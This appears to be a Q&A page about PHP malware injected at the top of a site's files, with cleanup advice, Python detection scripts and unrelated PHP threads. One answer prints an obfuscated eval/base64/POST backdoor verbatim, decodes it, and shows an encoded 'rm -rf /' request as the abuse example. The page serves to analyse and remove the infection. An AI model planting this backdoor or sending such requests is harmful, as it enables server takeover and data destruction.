Does somebody know what this code virus in PHP is? - php
I don't know what it is. I found it inside all the PHP files on my server. I think it is a kind of virus or something else? What do you think, guys? It is already on my server, inside each PHP file at the top of the document, and below this code my normal code starts.
I'll appreciate your help thanks!
This is not the answer for your question, but since it's the same issue I am having (https://stackoverflow.com/questions/24881340/malware-code-being-injected-in-my-php-scripts) (and I don't have the necessary reputation points to post a comment), here's a script to scan and remove all the php files: http://pastebin.com/JgyDZj3R
Make sure to change {username} to your account's username, create a file named yoyo.txt in the same directory as this PHP script and paste the illegal code in that file.
It's best if you have SSH access since it will take a lot of time to execute depending on how many files you have.
Hope this helps! :)
If you have SSH access to the server, and the website isn't usually modified that much, I suggest you try the following:
Log in through SSH
Navigate to the website directory
Execute the command find . -mtime -1 -type f
This will give a list of all files which have been modified in the last day. This way you can manually check them and remove the malicious code blocks.
Should the exploit have been installed earlier, you can expand your search to go further back e.g. find . -mtime -3 -type f to go back 3 days.
Do note this is just a quick fix for a single website, chances are your server has been completely compromised, in which case you either need to do a full reinstall as already stated above, or get some professional help.
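Modification time is only a hint: it can be reset, and the injection may be older than the search window. As an added example (not code from either answer), this Python script flags .php files by content, looking for an escape-heavy PHP block prepended before the file's real opening tag, and reports the file age alongside. The thresholds, regexes and the sample files built in demo() are assumptions constructed for this example.

```python
import os
import re
import tempfile
import time

# Heuristic thresholds: assumptions for this example, tune them for your code base.
MIN_PREFIX_LEN = 400   # injected blocks are long
MIN_ESCAPES = 20       # number of \xNN, \NNN or %xNN escapes in the block

# A complete <?php ... ?> block at byte 0, directly followed by another opening tag.
PREFIX = re.compile(rb"\A<\?php\s(.*?)\?>\s*(?=<\?|<!|<html)", re.S | re.I)
ESCAPE = re.compile(rb"\\x[0-9a-fA-F]{2}|\\[0-7]{2,3}|%x[0-9a-fA-F]{2}")
# Dynamic execution inside the prefix: eval, preg_replace, $GLOBALS[...], $var(...)
DYNAMIC = re.compile(rb"\beval\s*\(|preg_replace|\$GLOBALS\s*\[|\$\w+\s*\(")


def injected_prefix(data):
    """Return the leading PHP block if it looks like injected code, else None."""
    m = PREFIX.match(data)
    if m is None:
        return None
    block = m.group(0)
    if (len(block) >= MIN_PREFIX_LEN
            and len(ESCAPE.findall(block)) >= MIN_ESCAPES
            and DYNAMIC.search(block)):
        return block
    return None


def scan(root, now=None):
    """Walk root; return sorted [(path, age_in_days, prefix_length)] for flagged files."""
    now = time.time() if now is None else now
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                block = injected_prefix(fh.read())
            if block is not None:
                age = (now - os.path.getmtime(path)) / 86400
                hits.append((path, age, len(block)))
    return sorted(hits)


def demo():
    """Scan a constructed tree: one clean file, one infected file with a 30-day-old mtime."""
    blob = b"%x5c%x78" * 60  # constructed, inert filler imitating the escape-heavy payload
    infected = (b"<?php $a='" + blob + b"'; $f=\"\\x65\\x76\\x61\\x6c\"; $f($a); ?>\n"
                b"<?php echo 'site code'; ?>\n")
    clean = b"<?php\nrequire __DIR__ . '/config.php';\necho 'site code';\n"
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", infected), ("clean.php", clean)):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        old = time.time() - 30 * 86400
        # An old mtime hides the file from `find . -mtime -1`, but not from a content scan.
        os.utime(os.path.join(root, "index.php"), (old, old))
        return [(os.path.basename(p), round(age), n >= MIN_PREFIX_LEN)
                for p, age, n in scan(root)]


if __name__ == "__main__":
    for name, age, _ in demo():
        print(f"{name}: injected prefix found, file last modified {age} days ago")
```

Flagged files still need manual review before anything is removed, and a restore from a known-good copy is safer than editing in place.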
Related
PHP cron require path issue
I'm having an issue with PHP require (I think) and crontab. I'm using AWS. The error looks like this:
PHP Fatal error: require(): Failed opening required '/inc/classes/core/inc.php' (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/html/inc/files/core/config.php on line 16
My PHP require looks like this:
require($_SERVER['DOCUMENT_ROOT'].'/inc/files/core/config.php');
There are similar issues here about the same thing and I looked at them, but their solutions didn't seem to work for me. One of the things I tried from Stackoverflow was this:
$_SERVER['DOCUMENT_ROOT'] = realpath(dirname(__FILE__).'/../../../../');
require($_SERVER['DOCUMENT_ROOT'].'/inc/files/core/config.php');
Another was adding this to my php ini file (also a suggestion from another thread):
include_path = ".:/usr/share/php:/var/www/<directory>/"
I also tried being direct with the path (i.e., /var/www/public/inc/etc) which didn't work. My file dictionary is like:
public
-- inc
---- files
------ site
-------- cron
-- etc
-- etc
I should note that the requires are the same on every page and they work, except in the cron job. I read that this could be because of the $_SERVER['DOCUMENT_ROOT'] var being set by the user as they browse and can't be set by the crontab, but I can't figure out the fix. The crontab looks like this, but it seems to send an email every 5 minutes like it's supposed to so I don't think there's any issue here.
*/5 * * * * /usr/bin/php /var/www/html/inc/files/site/cron/shop.php
I'm hoping someone has some insight on this because I'm stumped! I didn't set up any of the crontab work but the person who did left, and I'm not familiar with it. I put in all the information here I could think of, but I'm happy to answer any additional questions.
There is no $_SERVER when running php-cli. It will return empty or null value.
$_SERVER is an array containing information such as headers, paths, and script locations. The entries in this array are created by the web server. https://secure.php.net/manual/en/reserved.variables.server.php
Replace with a path to the file you want, assuming the path of the script you are running. This may work, but maybe you need to add or remove some of the ../
require(__DIR__ . '/../../../files/core/config.php');
The error you get points to config.php file. You probably have another $_SERVER there, that you need to replace and/or find a way to identify whether it is an HTTP request or php-cli. Something like
if (!empty($_SERVER['DOCUMENT_ROOT'])) { require($_SERVER['DOCUMENT_ROOT'] . ...); } else { require(__DIR__. ...); }
You may want to add a global constant that points to the root of your project.
// define() is used because const is not allowed inside a conditional block
if (!empty($_SERVER['DOCUMENT_ROOT'])) { define('BASEDIR', $_SERVER['DOCUMENT_ROOT']); } else { define('BASEDIR', __DIR__. ...); }
Then use BASEDIR for the entire application.
EDIT: as suggested by @YvesLeBorg, you can create a different file, that calls your entry point with curl or wget.
*/5 * * * * /bin/sh /path/to/my_script.sh
Then in my_script.sh you can write
wget http://my_web_page/shop.php
Then you will have a $_SERVER and there is no need to refactor. Be aware of security, as anyone can call your page and run your process. You may want to use a token and validate IP Address to be sure that only you can call this shop.php page.
Unusual Code in almost each WordPress PHP File
Can anyone explain this code? I am having this code on the top of almost every php file. What is this code for? Thanks for your help. Here is the code....
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>
I've seen that code a number of times in different incarnations. It's a piece of injected code left by an attacker. If you break it down it almost always results in eval($var); where $var is an injected parameter (usually $_POST) that then is used to perform some sort of malicious act on your server. Bear in mind eval() will execute any linux command with the same permissions and authority of the user running Apache/PHP.
Breaking down your example
In your example you've given the following code:
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>
This is semi-obfuscated code but let's start to work through it. The first thing we need to do here is format it to start to understand it:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n642afe'])) {
    eval($s21(${$s20}['n642afe']));
}
?>
We can see now that this is a relatively simple PHP script.
Line 1: $sF="PCT4BA6ODSE_"; is just a variable with what seems like random rubbish in it.
Line 2: $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]); This can be translated into: $s21 = "base64_decode"
Line 3: $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); As above, running strtoupper() on that string produces the result _POST.
Line 4: The if statement here checks to see if ${s20}['n642afe'] is set. Well we know that $s20 evaluates to _POST and ${} type variables take the value as their variable name so this is really: if(isset($_POST['n642afe'])){
Note: The n642afe part is a random parameter they've chosen so that if you (or any other attacker!!!) tries to go to somefile.php?hack=yes it wouldn't work
Line 5: The most dangerous part is here. Let's evaluate our variables in the same manner as above: eval($s21(${$s20}['n642afe'])); The end result eval(base64_decode($_POST['n642afe']));
If I were to send rm -rf / base64 encoded as post value for the parameter n642afe that would recursively delete everything. Unlikely it'd be able to do that without super user permissions but the point is - they'd have the same access rights as you do when you SSH to your server. Here's an example of what that'd look like:
http://example.com/infected.php?n642afe=cm0gLXJmIC8=
Translated, this becomes: eval(base64_decode('cm0gLXJmIC8=')); And then again: eval('rm -rf /');
My recommendation is - take the site offline immediately, update it, patch any holes that are obvious and then make sure your server (and any other sites on there) are secure. Pay particular attention to file and folder permissions on your server. Note: this is a non-exhaustive list, there's so much more you can do to protect yourself.
If you simply delete this line you'll probably find one of two things will happen (or both):
The permissions on the "infected" file are different and the file is owned by a different user. You'll need to chmod/chown the file to get it back
The attackers will keep trying to get back in once they've been successful once.
Simply removing the bad code is a good start but ask yourself this: "How did they get in in the first place?". With that in mind, please refer to my recommendation paragraph to begin to solve your issue.
Finding how they got in
To find where attackers 'got in' could be a game of cat and mouse, it's worth starting with the apache access logs though and searching for requests to your infected file with the parameter n642afe. You could also check your PHP logs to see what exactly was run and see what other holes they've opened.
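The line-by-line breakdown in the answer above can be done statically, without ever running the PHP. As an added example (not part of the original answer), this Python resolver handles the index-concatenation pattern in the snippet from the question and reports which request parameter feeds eval(); the function names and regexes are this example's own and cover only this obfuscation style.

```python
import re

# The snippet posted in the question, verbatim (only parsed here, never executed).
SAMPLE = (
    r'''<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6]'''
    r'''.$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);'''
    r'''$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);'''
    r'''if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>'''
)

STR_ASSIGN = re.compile(r'''\$(\w+)\s*=\s*(["'])(.*?)\2\s*;''')
IDX_CONCAT = re.compile(
    r'\$(\w+)\s*=\s*(strtolower|strtoupper)\s*\(\s*((?:\$\w+\[\d+\]\s*\.?\s*)+)\)\s*;')
IDX_TERM = re.compile(r'\$(\w+)\[(\d+)\]')
EVAL_CALL = re.compile(r'eval\s*\((.*?)\)\s*;')
VAR_VAR = re.compile(r'\$\{\$(\w+)\}')    # ${$name}: variable-variable
VAR_CALL = re.compile(r'\$(\w+)\s*\(')    # $name(...): variable function call
REQUEST_KEY = re.compile(r'''\$_(POST|GET|REQUEST|COOKIE)\[["'](\w+)["']\]''')


def resolve_names(php):
    """Map each variable built from $str[i].$str[j]... to the string it spells."""
    strings = {m.group(1): m.group(3) for m in STR_ASSIGN.finditer(php)}
    names = {}
    for m in IDX_CONCAT.finditer(php):
        var, func, expr = m.groups()
        try:
            text = "".join(strings[v][int(i)] for v, i in IDX_TERM.findall(expr))
        except (KeyError, IndexError):
            continue  # source string unknown or index out of range: leave unresolved
        names[var] = text.lower() if func == "strtolower" else text.upper()
    return names


def analyse(php):
    """Rewrite the eval() call with resolved names and list request keys that reach it."""
    names = resolve_names(php)
    m = EVAL_CALL.search(php)
    if m is None:
        return {"names": names, "eval": None, "request_keys": [], "backdoor": False}
    expr = m.group(1)
    expr = VAR_VAR.sub(
        lambda v: "$" + names[v.group(1)] if v.group(1) in names else v.group(0), expr)
    expr = VAR_CALL.sub(
        lambda v: names[v.group(1)] + "(" if v.group(1) in names else v.group(0), expr)
    keys = REQUEST_KEY.findall(expr)
    return {
        "names": names,
        "eval": "eval(" + expr + ");",
        "request_keys": keys,
        # eval() on request-controlled data is the backdoor the answer describes
        "backdoor": bool(keys),
    }


if __name__ == "__main__":
    report = analyse(SAMPLE)
    print(report["names"])
    print(report["eval"])
    print("request-controlled eval:", report["backdoor"], report["request_keys"])
```

The recovered parameter name is also the string to look for when reviewing web server and PHP logs for requests to the infected files.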
What is getScenarioPath and getScenarioResourceFolder?
I am looking at someone's project and keep getting this line: $resource_folder = getScenarioResourceFolder(getScenarioPath($scenario)); I cannot find any function that he implemented under those two names - getScenarioResourceFolder and getScenarioPath. I started wondering that maybe the name Scenario has something to do with $scenario variable being in those functions. I know it might sound dumb, but I do not know what else to think. Does anyone know about these functions?
I know these: You can search the function: http://id1.php.net/manual-lookup.php?pattern=getScenarioPath If there is no result, that must be a user-defined function. You can check yourself by using if (function_exists('getScenarioPath')) { ... } else { ... }
These are clearly custom functions that have been written in. The simplest solution would be to GREP your entire system for getScenarioResourceFolder - you are looking for a .php file. If you can't grep or don't know how, then it's time to go digging. Open any PHP files that are related to that project and look for getScenarioResourceFolder(). If you really don't have it, then you'll have to get in touch with the original architect of the project.
Options for reading a remote directory
I have a script that displays images based on certain conditions. When none of the conditions are met, I want to randomly display one of the standard (backup) images. Those other images are on a remote server. I have read that you can't read a directory on a remote server, which makes sense. Is my best bet to place a file into the remote server's image directory that outputs all of the image file names so I can parse it with the other server? Is there an easier way? I prefer not to use FTP (http://php.net/manual/en/book.ftp.php). What are my options for basically just getting the names of the images in that folder? Thanks, Ryan
UPDATE: @mario's answer is lightweight and works like a charm. It is exactly the solution I thought I wanted, but after thinking about it some more, and reading that even @mario would do it differently, I decided to go with @bensiu's answer, because to me, control and security are more important than convenience. With @mario's method, it's very hard to know if the data you're getting is any good (lack of control) and you're exposing your directory / some server information (security). @bensiu's suggestion involves a second file (inconvenience), but provides the control and security I'm ultimately deciding to go with! Thank you both! -Ryan
I would prefer an exact and dedicated handler script like @bensiu pointed out. But an alternative would be to read out a directory listing. A simple Apache generated mod_index listing would be sufficient for:
$html = file_get_contents("http://example.com/images/");
preg_match_all('/<a href="([-\w\d.]+\.(jpeg|png|gif))"/', $html, $uu);
$files = $uu[1];
I hope you at least have access to remote server... You can place there script "A" that will do the job locally, return list of images in preferred format (raw text, JSON, XML...), and this script will be remotely called by curl from your server.... It is also wise to make sure that when you call script "A" you are at least passing some secret key to prevent unauthorised access (not perfect solution but could be enough)
If you have PHP5 and the HTTP stream wrapper enabled on your server, it's very easy and simple to copy it to a local file:
copy('http://somedomain.com/file.jpeg', '/tmp/file.jpeg');
Some hosts disable copy() function then you can make your own -
<?php
function copyemz($file1, $file2) {
    // Fetch the source; @ suppresses the warning so failure is reported via the return value
    $contentx = @file_get_contents($file1);
    if ($contentx === FALSE) {
        return false;
    }
    // Only create the local file once the download has succeeded
    $openedfile = fopen($file2, "w");
    if ($openedfile === FALSE) {
        return false;
    }
    fwrite($openedfile, $contentx);
    fclose($openedfile);
    return true;
}
?>
PHP File Navigation (Local + Remote)
I have been working on a content management system (nakid) and one of my toughest challenges is the file navigation. I want to make sure the file paths and settings work on local and remote servers. Right now my setup is pretty much something like this:
first.php (used by all pages):
//Set paths to nakid root
$core['dir_cur'] = dirname(__FILE__);
$core['dir_root'] = $_SERVER['DOCUMENT_ROOT'];
//Detect current nakid directory
$get_dirnakid_1 = str_replace("\\","/",dirname(__FILE__));//If on local
$get_dirnakid_2 = str_replace("/includes/php","",$get_dirnakid_1);
$get_dirnakid_3 = str_replace($_SERVER['DOCUMENT_ROOT'],"",$get_dirnakid_2);
//remove first "/"
if(substr($get_dirnakid_3, 0,1) == "/"){
    $get_dirnakid_3 = substr($get_dirnakid_3, 1);
}
//Set some default vars
$core['dir_nakid_path'] = $get_dirnakid_3;
$core['dir_nakid'] = $core['dir_root']."/".$core['dir_nakid_path'];//We need to get system() for this real value - below
The reason I also did it this way is because I want the directory that this program is sitting in to be anywhere on the server ie(/nakid)(/cms)(/admin/cms) I'm positive I am doing something the wrong way or that there is a simpler way to take care of all this. If it helps to get a closer look at the code and how everything is being used I have it all up at nakid.org
EDIT: Just realized what I have at nakid.org is a little different than my newly posted code, but the same idea still applies to what I am attempting to do.
By and large, it looks okay to me. You might want to give the variables more speaking names (e.g. nakid_root_dir, nakid_relative_webroot and so on.) Remember when converting \ to / in path names: Whenever you match another directory name to one of those settings, you need to str_replace("\\","/"...) in those too. I don't understand what you aim at with $get_dirnakid_2, though. Why will you screw up my path if I install your application in a directory that happens to be named /etc/includes/php/nakid? Anyway, you should make those settings user overwritable as well. Sometimes, the user may want to set different settings from what you get from DOCUMENT_ROOT and consorts.
I don't fully understand what you try to get, but maybe getcwd() is what you look for: http://www.php.net/manual/en/function.getcwd.php